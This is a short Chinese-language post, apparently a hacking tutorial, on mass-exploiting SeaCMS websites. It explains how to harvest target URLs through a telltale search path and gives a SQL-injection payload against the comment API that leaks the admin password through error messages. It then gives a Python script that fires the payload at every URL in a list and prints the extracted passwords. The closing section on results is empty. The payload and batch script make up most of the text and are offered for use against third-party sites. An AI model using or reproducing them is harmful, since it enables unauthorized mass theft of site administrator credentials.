0x001-url采集
通过对海洋cms源码研究,找出含有标志性的网站目录(search.php?searchtype=),然后利用url采集工具批量采集seacms网站
0x002-漏洞payload
payload:/`comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20(password)from%20sea_admin))),@`%27
0x003-exp制作
import requests
import re
urls = open("url.txt","r")
a = []
for url in urls:
url1 = url.strip()
a.append(url1)
urls.close()
aa = list(set(a))
with open("url.txt","w") as f:
result = "\n".join(aa)
f.write(result)
urls = open("url.txt", "r")
exp = '/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20(password)from%20sea_admin))),@`%27`'
pattern = re.compile("error: '(.*?)'")
for url in urls:
try:
target = url.strip() + exp
html = requests.get(target).text
if "seacms" in html:
print(target)
print("该url存在漏洞:"+url)
print(re.search(pattern,html).group(1))
except Exception as e:
pass
0x004-exp的使用效果*